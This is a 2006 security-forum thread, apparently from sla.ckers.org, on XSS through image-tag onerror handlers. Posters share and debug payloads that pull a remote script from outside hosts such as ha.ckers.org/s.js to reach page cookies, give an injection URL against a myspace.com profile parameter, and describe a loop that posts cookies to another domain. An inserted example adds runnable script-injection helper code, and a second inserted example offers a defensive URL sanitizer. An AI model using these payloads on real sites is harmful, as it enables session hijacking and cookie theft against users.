Sla.ckers.org
Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixation, hijacking, lockout, replay, session riding, etc.
Re: CSRF from inside image tags, discuss please
Posted by: maluc
Date: November 09, 2006 12:49PM

Yes, alert can be any JavaScript code, so insert an entire exploit or just load a remote script:

<img src="" onerror="x=document.createElement('<sc'+'ript src=http://ha.ckers.org/s.js>');document.body.appendChild(x)">

the remote script has full access to the DOM, including cookies

As for the iframe not working, that may be IE6 only; too lazy to consult the XSS cheat sheet.

-maluc

Re: CSRF from inside image tags, discuss please
Posted by: sjensen
Date: November 09, 2006 01:12PM

I pasted the above script in but received an "Internet Explorer cannot open the Internet site" error. This may be because my company has the ha.ckers.org site blocked.

btw, I'm running IE 7.

Re: CSRF from inside image tags, discuss please
Posted by: rsnake
Date: November 09, 2006 01:25PM

That's retarded. Why do people keep blocking this domain? That's easy enough to get around. I threw the xss.js file on fthe.net:

http://fthe.net/xss.js

- RSnake
Gotta love it. http://ha.ckers.org

Re: CSRF from inside image tags, discuss please
Posted by: sjensen
Date: November 09, 2006 01:54PM

I changed the URL and still got the same "IE can't open the Internet site..." error message, but it did throw the alert with the cookie in it.

Re: CSRF from inside image tags, discuss please
Posted by: maluc
Date: November 09, 2006 02:01PM

Oh sorry, I forgot to add defer. IE freaks out if you add anything to the document innerHTML before the page finishes loading; adding DEFER should solve it:

<img src="" onerror="x=document.createElement('<sc'+'ript defer src=http://ha.ckers.org/s.js>');document.body.appendChild(x)">

By the way, I can't tell you how long the damned error took me to debug the first time I ran across it ^^;

-maluc

Re: CSRF from inside image tags, discuss please
Posted by: sjensen
Date: November 09, 2006 02:18PM

Adding the "defer" didn't prevent the error, but that's okay, because by adding that script it actually causes the application to crash anyway...

I did another test using xss that locked the application in an infinite loop posting the cookie value to another domain, then doing a history.back, then it reposts, then back, etc...also causing the application to crash...

Re: CSRF from inside image tags, discuss please
Posted by: maluc
Date: November 09, 2006 04:29PM

Hrm, yeah, my logic was a bit flawed on that one, because just appending the script tag (or anything) to the document was enough to cause the error while loading. So the only surefire way is to either:

A) when it's for XSS which injects HTML, not JavaScript: use the defer attribute, e.g.
http://myspace.com/profile?id="><script defer src="http://ha.ckers.org/s.js"></script><x
or

B) when it's for XSS which injects into JavaScript code: add a function to the window.onload event to insert that remote script into the document. This has the drawback of not executing until the page fully loads, so if that's unacceptable, the only choice is to inject the entire exploit into the local JavaScript.

An example of window.onload appending that doesn't overwrite existing window.onload events (overwriting might badly break a page); note that attachEvent wants the function itself, not its name as a string:
if(window.attachEvent){window.attachEvent('onload',exploit)}function exploit(){alert('exploit code goes here')}

That only works for IE. To work in Firefox too, add an
else if(window.addEventListener){window.addEventListener('load',exploit,false)}
Thank IE for not following W3C standards.

All that replaces the blah in <img src="" onerror="blah">. Hopefully I didn't overcomplicate the explanation (or make mistakes; too lazy to test but should work fine).

-maluc

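The pattern maluc describes above, as an added example that is not part of the original thread: hook the page's load event without clobbering an existing window.onload (standards API first, the legacy IE API second, plain chaining as a last resort), then inject the remote script with the portable createElement('script') form rather than IE's createElement('<script ...>'). The window/document stub, the function names and the example.invalid URL are constructed for offline demonstration; in a browser you would pass window and document.

```javascript
// Added example (mine, not from the thread): hook the page's load event without
// clobbering an existing window.onload, trying the standards API first and the
// legacy IE API second, then inject a remote script the standard way. `win` and
// `doc` are whatever window/document you pass in; in a browser that is
// window and document. The stub below is constructed so this runs offline.

function hookLoad(win, fn) {
  if (typeof win.addEventListener === 'function') {
    win.addEventListener('load', fn, false);   // W3C DOM Events: Firefox, Opera, IE9+
    return 'addEventListener';
  }
  if (typeof win.attachEvent === 'function') {
    win.attachEvent('onload', fn);             // IE5-8: pass the function, not its name as a string
    return 'attachEvent';
  }
  // Last resort: chain onto the property so the page's own handler still runs.
  var previous = win.onload;
  win.onload = function () {
    if (typeof previous === 'function') previous.apply(this, arguments);
    return fn.apply(this, arguments);
  };
  return 'onload-chain';
}

// createElement('script') + .src works in every browser; createElement('<script src=...>')
// was an IE-only extension.
function injectScript(doc, url, defer) {
  var s = doc.createElement('script');
  s.src = url;
  s.defer = !!defer;
  doc.body.appendChild(s);
  return s;
}

// Constructed stand-in for a browser window that has a page-supplied onload
// handler and neither event API, to exercise the chaining fallback.
function makeLegacyWindowStub() {
  var log = [];
  var doc = {
    body: { children: [], appendChild: function (el) { this.children.push(el); } },
    createElement: function (tag) { return { tagName: tag.toUpperCase() }; }
  };
  return { document: doc, log: log, onload: function () { log.push('page-onload'); } };
}

function demo() {
  var win = makeLegacyWindowStub();
  var method = hookLoad(win, function () {
    injectScript(win.document, 'http://example.invalid/s.js', true); // hypothetical URL
    win.log.push('exploit');
  });
  win.onload();   // simulate the browser firing load after the page has finished parsing
  return { method: method, log: win.log, scripts: win.document.body.children };
}
```

In the fallback path the page's original handler runs first and the injected one second, which is the property the post asks for; the two real APIs keep that ordering on their own because they accumulate listeners instead of replacing a property.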
Re: CSRF from inside image tags, discuss please
Posted by: sjensen
Date: November 09, 2006 05:01PM

Strange... must be an ASP.NET thing, because window.attachEvent doesn't work. It renders the code to the page, but it doesn't execute it.

Re: CSRF from inside image tags, discuss please
Posted by: bobstar
Date: December 04, 2006 10:06PM

Is it possible to execute anything on the _current_ page where the img tag resides?

I'd like to e.g. forward the page to some other URL or execute some javascript...

Re: CSRF from inside image tags, discuss please
Posted by: maluc
Date: December 04, 2006 10:39PM

Nope, only in IE6, with <img src="javascript:alert(1)">

Can't do it in Firefox or IE7 though. In those, it's only useful for CSRF that doesn't require an XSS or POSTing.

-maluc

Re: CSRF from inside image tags, discuss please
Posted by: rsnake
Date: December 05, 2006 10:25AM

Or how about <IMG SRC="" onerror="alert('XSS')">? That would work too. ;) But if you are JUST talking about CSRF and not XSS the answer is no: you can't force the browser to go anywhere other than request a page. It won't "go" there as in render the content inside of the image tag, but it will send the browser there and act as a "click" regardless of whether the page you request is an image or not.

- RSnake
Gotta love it. http://ha.ckers.org

Re: CSRF from inside image tags, discuss please
Posted by: maluc
Date: December 05, 2006 01:51PM

Ah, I was making the assumption it wasn't XSS and was similar to the normal 'pick your remote image for an avatar'. But if you can insert " quotation marks in that, onerror is definitely the way to go.

-maluc

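The server-side counterpart to the avatar case maluc describes, as an added example that is not part of the original thread: render a user-supplied image URL into <img src="..."> so that neither the quote breakout into onerror nor the javascript: URL that IE6 honoured in img src (from the earlier reply) can execute. The function names and sample inputs are my own; example.invalid is a placeholder host.

```javascript
// Added example (mine, not from the thread): rendering a user-supplied avatar URL
// so that a " breakout into onerror and a javascript: scheme are both inert.
function attrEncode(s) {
  var map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, function (c) { return map[c]; });
}

// Allow only absolute http(s) URLs and return them in canonical, percent-encoded form.
function safeAvatarUrl(raw) {
  var u;
  try { u = new URL(String(raw)); } catch (e) { return null; }          // relative or garbage input
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;  // javascript:, data:, vbscript:
  return u.href;
}

function renderAvatar(raw) {
  var url = safeAvatarUrl(raw);
  if (url === null) return '<img src="" alt="avatar">';  // nothing user-controlled reaches the attribute
  return '<img src="' + attrEncode(url) + '" alt="avatar">';
}

// Constructed inputs: two quote breakouts, the IE6 javascript: trick, and two benign URLs.
var samples = {
  breakout: 'http://example.invalid/a.png" onerror="alert(1)',
  bareBreakout: 'a.png" onerror="alert(1)',
  jsScheme: 'javascript:alert(1)',
  plain: 'http://example.invalid/a.png',
  query: 'http://example.invalid/a.png?size=64&format=png'
};
```

Two layers do the work: the URL parser rejects non-http(s) schemes and percent-encodes the quote and space in an absolute URL, and attrEncode handles what the parser leaves alone (the & in a query string, for instance), so the attribute boundary is never under the user's control even if one layer is later relaxed.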